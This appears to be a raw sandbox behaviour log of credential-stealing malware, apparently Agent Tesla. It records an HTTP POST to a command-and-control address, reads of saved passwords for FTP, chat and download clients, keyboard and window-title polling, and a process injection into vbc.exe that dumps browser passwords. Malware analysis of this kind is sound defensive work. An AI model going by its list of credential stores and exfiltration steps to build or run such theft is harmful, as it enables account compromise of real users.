Inet Send HTTP Request headers = User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729), Content-Type: application/x-www-form-urlencoded, Host: www.agenttesla.com, Content-Length: 284, Expect: 100-continue, url = www.agenttesla.com/post.php True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 4096, size_out = 367 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 367 True 1
Fn
Data
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
Fn
DNS Resolve Name host = survey-smiles.com, address_out = 127.0.0.1 True 1
Fn
Socket Connect remote_address = 127.0.0.1, remote_port = 80 False 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Environment Get Environment String name = APPDATA, result_out = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\CoreFTP\sites.idx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ False 1
Fn
COM Get Class ID cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites, value_name = Host, data = 2147942402 False 1
Fn
COM Get Class ID cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Registry Read Value value_name = HKEY_CURRENT_USERSoftwareFTPWareCOREFTPSitesPort, data = 2147942403 False 1
Fn
COM Get Class ID cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Registry Read Value value_name = HKEY_CURRENT_USERSoftwareFTPWareCOREFTPSitesUser, data = 2147942403 False 1
Fn
COM Get Class ID cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Registry Read Value value_name = HKEY_CURRENT_USERSoftwareFTPWareCOREFTPSitesPW, data = 2147942403 False 1
Fn
COM Get Class ID cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Registry Read Value value_name = HKEY_CURRENT_USERSoftwareFTPWareCOREFTPSitesName, data = 2147942403 False 1
Fn
File Get Info filename = C:\ProgramData\DynDNS\Updater\config.dyndns, type = file_attributes False 1
Fn
Environment Get Environment String name = APPDATA, result_out = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\FileZilla\recentservers.xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Users\All Users\AppData\Roaming\FlashFXP\3quick.dat, type = file_attributes False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Paltalk False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\.purple\accounts.xml, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\, type = file_attributes False 1
Fn
COM Get Class ID cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FTP Commander, value_name = UninstallString, data = 2147942402 False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Ftplist.txt, type = file_attributes False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC False 2
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Vitalwerks\DUC False 2
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\DownloadManager\Passwords False 1
Fn
File Get Info filename = C:\Program Files (x86)\jDownloader\config\database.script, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, type = file_attributes True 1
Fn
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Fn
File Delete filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt True 1
Fn
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Explorer.txt, type = file_attributes False 1
Fn
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\IEPass.txt, type = file_attributes True 1
Fn
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Fn
File Delete filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\IEPass.txt True 1
Fn
Module Get Handle module_name = private_0x0000000000400000, base_address = 0x400000 True 2
Fn
Window Create class_name = WindowsForms10.Window.8.app.0.33c0d9d, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.33c0d9d, index = -4, new_long = 1997940189 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.33c0d9d, index = -4, new_long = 34805690 True 1
Fn
System Get foreground window - True 1
Fn
System Get window text window_text = 2550884 True 1
Fn
System Get foreground window - True 1
Fn
System Get window text window_text = 2550884 True 1
Fn
System Get foreground window - True 1
Fn
System Get window text window_text = 2550884 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
System Get foreground window - True 1
Fn
System Get window text window_text = 2550884 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CAPITAL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CAPITAL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CAPITAL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read result_out = 1 True 1
Fn
System Get foreground window - True 1
Fn
Keyboard Get Info type = KB_LOCALE_ID, os_tid = 1120, result_out = 67699721 True 1
Fn
System Get foreground window - True 1
Fn
System Get window text window_text = 2550884 False 1
Fn
System Get foreground window - True 1
Fn
System Get window text window_text = 2550884 False 1
Fn
System Get foreground window - True 1
Fn
System Get window text window_text = 2550884 False 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = -127 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = -127 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = -127 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = -127 True 1
Fn
Keyboard Read virtual_key_code = VK_CAPITAL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = -127 True 1
Fn
Keyboard Read virtual_key_code = VK_CAPITAL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = -127 True 1
Fn
Keyboard Read virtual_key_code = VK_CAPITAL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = -127 True 1
Fn
Keyboard Read result_out = 1 True 1
Fn
System Get foreground window - True 1
Fn
Keyboard Get Info type = KB_LOCALE_ID, os_tid = 1120, result_out = 67699721 True 1
Fn
System Get foreground window - True 1
Fn
System Get window text window_text = 2550884 True 1
Fn
System Get foreground window - True 1
Fn
System Get window text window_text = 2550884 False 1
Fn
System Get foreground window - True 1
Fn
System Get window text window_text = 2550884 False 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = -127 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = -127 True 1
Fn
System Get foreground window - True 1
Fn
System Get window text window_text = 2550884 True 1
Fn
System Get foreground window - True 1
Fn
System Get window text window_text = 2550884 True 1
Fn
System Get foreground window - True 1
Fn
System Get window text window_text = 2550884 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 1 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 1 True 1
Fn
System Get foreground window - True 1
Fn
System Get window text window_text = 2550884 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 1 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 1 True 1
Fn
System Get foreground window - True 1
Fn
System Get window text window_text = 2550884 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 1 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 1 True 1
Fn
Thread 0xb2c
1 0
»
Category Operation Information Success Count Logfile
Thread 0xb7c
5 0
»
Category Operation Information Success Count Logfile
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 5
Fn
Thread 0xb80
52 0
»
Category Operation Information Success Count Logfile
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Module Load module_name = C:\Windows\Microsoft.NET\Framework\v2.0.50727\\wminet_utils.dll, base_address = 0x6a310000 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = ResetSecurity, address_out = 0x6a311944 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = SetSecurity, address_out = 0x6a311986 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = BlessIWbemServices, address_out = 0x6a3119cc True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = BlessIWbemServicesObject, address_out = 0x6a311a1e True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetPropertyHandle, address_out = 0x6a311a70 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = WritePropertyValue, address_out = 0x6a311a89 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Clone, address_out = 0x6a311aa2 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = VerifyClientKey, address_out = 0x6a312270 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetQualifierSet, address_out = 0x6a311d73 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Get, address_out = 0x6a311b96 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Put, address_out = 0x6a311b7a True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Delete, address_out = 0x6a311bb5 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetNames, address_out = 0x6a311bc8 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = BeginEnumeration, address_out = 0x6a311be4 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Next, address_out = 0x6a311bf7 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = EndEnumeration, address_out = 0x6a311c16 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetPropertyQualifierSet, address_out = 0x6a311c26 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Clone, address_out = 0x6a311aa2 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetObjectText, address_out = 0x6a311c3c True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = SpawnDerivedClass, address_out = 0x6a311c52 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = SpawnInstance, address_out = 0x6a311c68 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = CompareTo, address_out = 0x6a311c7e True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetPropertyOrigin, address_out = 0x6a311c94 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = InheritsFrom, address_out = 0x6a311caa True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetMethod, address_out = 0x6a311cbd True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = PutMethod, address_out = 0x6a311cd9 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = DeleteMethod, address_out = 0x6a311cf5 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = BeginMethodEnumeration, address_out = 0x6a311d08 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = NextMethod, address_out = 0x6a311d1b True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = EndMethodEnumeration, address_out = 0x6a311d37 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetMethodQualifierSet, address_out = 0x6a311d47 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetMethodOrigin, address_out = 0x6a311d5d True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_Get, address_out = 0x6a311d86 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_Put, address_out = 0x6a311da2 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_Delete, address_out = 0x6a311dbb True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_GetNames, address_out = 0x6a311dce True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_BeginEnumeration, address_out = 0x6a311de4 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_Next, address_out = 0x6a311df7 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_EndEnumeration, address_out = 0x6a311e13 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetCurrentApartmentType, address_out = 0x6a311d73 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetDemultiplexedStub, address_out = 0x6a3118fd True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = CreateInstanceEnumWmi, address_out = 0x6a311580 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = CreateClassEnumWmi, address_out = 0x6a3115f6 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = ExecQueryWmi, address_out = 0x6a31169e True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = ExecNotificationQueryWmi, address_out = 0x6a311717 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = PutInstanceWmi, address_out = 0x6a311790 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = PutClassWmi, address_out = 0x6a311810 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = CloneEnumWbemClassObject, address_out = 0x6a311890 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = ConnectServerWmi, address_out = 0x6a3124b7 True 1
Fn
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Thread 0xbc4
19 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2019-07-22 00:25:10 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:11 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:12 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:13 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:14 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:15 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:16 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:17 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:18 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:19 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:20 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:21 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:22 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:23 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:24 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:25 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:26 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:27 (UTC) True 1
Fn
System Get Time type = System Time, time = 2019-07-22 00:25:28 (UTC) True 1
Fn
Process #4: vbc.exe
56 0
»
Information Value
ID #4
File Name c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
Command Line C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe -f C:\Users\5P5NRG~1\AppData\Local\Temp\IEPass.txt
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:55, Reason: Child Process
Unmonitor End Time: 00:00:57, Reason: Self Terminated
Monitor Duration 00:00:01
OS Process Information
»
Information Value
PID 0xbf8
Parent PID 0xb18 (c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x BFC
0x 6BC
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
buffer 0x00400000 0x00422FFF Marked Executable - 32-bit 0x0040F046, 0x00401000, ... False False
...
Injection Information
»
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Control Flow #2: c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe 0xb1c os_tid = 0xbfc True 1
Fn
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\5P5NRG~1\AppData\Local\Temp\IEPass.txt 389 bytes MD5: b8ea3a8f80e92d59650fbf1e4bc84bfd
SHA1: cbeed9d5866317cabf68ab8a356094fb06d761c0
SHA256: fdaeb29c5dc8d7be90d16833ec1afadf778cefde08f5ff22b0d420fe274da0f0
SSDeep: 3:r133PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPovL1E0AN0yOAVKXRy133a:evL1NyJvVNSvrJWgOWUVFDZNJ48WUfa 		False
...
Threads
Thread 0xbfc
56 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2019-07-22 00:25:12 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 17669373483 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x76c3359f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x76cb4195 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x76c3d31f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x76c4ee7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x7717441c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x7719c50e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x7719c381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x76c4f088 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x771805d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x7719ca24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x77150b8c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x7720fde8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x771a1e1d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x76cb4761 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x76cacd11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x76cb424f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x76cb46b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x76cc6676 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x76cb4751 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x76cc65f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x76cb47c1 True 1
Fn
